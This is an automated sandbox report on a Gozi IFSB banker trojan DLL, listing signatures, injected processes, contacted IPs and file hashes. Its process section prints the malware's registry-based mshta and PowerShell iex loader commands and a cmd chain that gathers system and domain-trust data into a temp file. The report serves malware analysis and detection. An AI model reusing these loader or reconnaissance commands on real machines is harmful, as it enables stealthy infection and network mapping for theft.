Malware Analysis Report

2024-10-19 01:08

Sample ID 220809-pv673scac9
Target f9d778ad3bfea174401f36a2d88851d8
SHA256 44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5

Threat Level: Known bad

The file f9d778ad3bfea174401f36a2d88851d8 was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Enumerates processes with tasklist

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Discovers systems in the same network

Gathers system information

Runs net.exe

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-09 12:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-09 12:40

Reported

2022-08-09 12:42

Platform

win7-20220718-en

Max time kernel

42s

Max time network

46s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1956 wrote to memory of 1968 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1956 wrote to memory of 1968 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1956 wrote to memory of 1968 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1956 wrote to memory of 1968 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1956 wrote to memory of 1968 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1956 wrote to memory of 1968 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1956 wrote to memory of 1968 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

Network

N/A

Files

memory/1956-54-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmp

memory/1968-55-0x0000000000000000-mapping.dmp

memory/1968-56-0x00000000756B1000-0x00000000756B3000-memory.dmp

memory/1968-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1968-62-0x00000000002B0000-0x00000000002BD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-09 12:40

Reported

2022-08-09 12:42

Platform

win10v2004-20220721-en

Max time kernel

150s

Max time network

146s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1436 set thread context of 60 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 60 set thread context of 3524 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 set thread context of 3812 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 set thread context of 1768 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 set thread context of 4660 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 set thread context of 3584 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3196 wrote to memory of 4288 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3196 wrote to memory of 4288 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3196 wrote to memory of 4288 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4152 wrote to memory of 1436 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4152 wrote to memory of 1436 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1436 wrote to memory of 1972 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1436 wrote to memory of 1972 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1972 wrote to memory of 4832 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1972 wrote to memory of 4832 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1436 wrote to memory of 2916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1436 wrote to memory of 2916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2916 wrote to memory of 3572 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2916 wrote to memory of 3572 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1436 wrote to memory of 60 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1436 wrote to memory of 60 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1436 wrote to memory of 60 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1436 wrote to memory of 60 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 60 wrote to memory of 3524 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 3524 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 3524 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 3524 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 3812 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 3812 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 3812 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 3812 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 1768 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 1768 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 1768 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 1768 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 4660 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 4660 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 4660 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 4660 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 wrote to memory of 1468 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 60 wrote to memory of 1468 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 60 wrote to memory of 3584 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 60 wrote to memory of 3584 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 60 wrote to memory of 3584 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 60 wrote to memory of 3584 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1468 wrote to memory of 2840 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1468 wrote to memory of 2840 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1468 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 1468 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 60 wrote to memory of 3584 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 60 wrote to memory of 3584 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 60 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 60 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 60 wrote to memory of 4272 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 60 wrote to memory of 4272 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4272 wrote to memory of 4256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4272 wrote to memory of 4256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 60 wrote to memory of 344 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 60 wrote to memory of 344 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 60 wrote to memory of 4248 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 60 wrote to memory of 4248 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4248 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4248 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 60 wrote to memory of 3504 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 60 wrote to memory of 3504 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 60 wrote to memory of 3968 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 60 wrote to memory of 3968 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3968 wrote to memory of 2740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 3968 wrote to memory of 2740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 60 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxyr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxyr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nyjpos -value gp; new-alias -name jbusogjixu -value iex; jbusogjixu ([System.Text.Encoding]::ASCII.GetString((nyjpos "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c35dm5m1\c35dm5m1.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF666.tmp" "c:\Users\Admin\AppData\Local\Temp\c35dm5m1\CSC746DBB6C54F74D7BAFF09F9D952EFF4A.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nujw4rst\nujw4rst.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF750.tmp" "c:\Users\Admin\AppData\Local\Temp\nujw4rst\CSCA36D566C37834C179A172717BBA0DA71.TMP"

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\BA64.bin1 > C:\Users\Admin\AppData\Local\Temp\BA64.bin & del C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

Network

Country Destination Domain Proto
US 93.184.220.29:80 tcp
FR 2.18.109.224:443 tcp
NL 20.50.201.200:443 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
NL 79.110.52.8:80 79.110.52.8 tcp
RU 5.42.199.72:80 5.42.199.72 tcp
NL 79.110.52.82:80 79.110.52.82 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

memory/4288-130-0x0000000000000000-mapping.dmp

memory/4288-131-0x0000000010000000-0x000000001000E000-memory.dmp

memory/4288-136-0x00000000013C0000-0x00000000013CD000-memory.dmp

memory/1436-140-0x0000000000000000-mapping.dmp

memory/1436-141-0x000001DFA1AF0000-0x000001DFA1B12000-memory.dmp

memory/1436-142-0x000001DF88AF0000-0x000001DF895B1000-memory.dmp

memory/1972-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\c35dm5m1\c35dm5m1.cmdline

MD5 fe44b87ca2fa7624e8bc9c803912179e
SHA1 1e18dd6710f1e48dca0b9f10d4e17bc2e2c6491a
SHA256 4ac321b0d0367c6645d0a4c0a51e060e9ac799b1a4e641318a2fcdbf7595211f
SHA512 a2294c281358b59399a84025ec9278c2a4502fa242955196ec6bc7cbd6c38025233559e9d17f45ae7702ff2d48eefc0e317b77ac9f6b78cac7a730a5ada5a5ef

\??\c:\Users\Admin\AppData\Local\Temp\c35dm5m1\c35dm5m1.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

memory/4832-146-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\c35dm5m1\CSC746DBB6C54F74D7BAFF09F9D952EFF4A.TMP

MD5 8705a8eacec366e67b0ea18bc7ffb133
SHA1 e1090791693a784ec5829e79223e5e852e4dac00
SHA256 dcc291f67eeef3a9d0fe3568b68d67ced00b6ca8bf1c95ec7d7450462d0a52d5
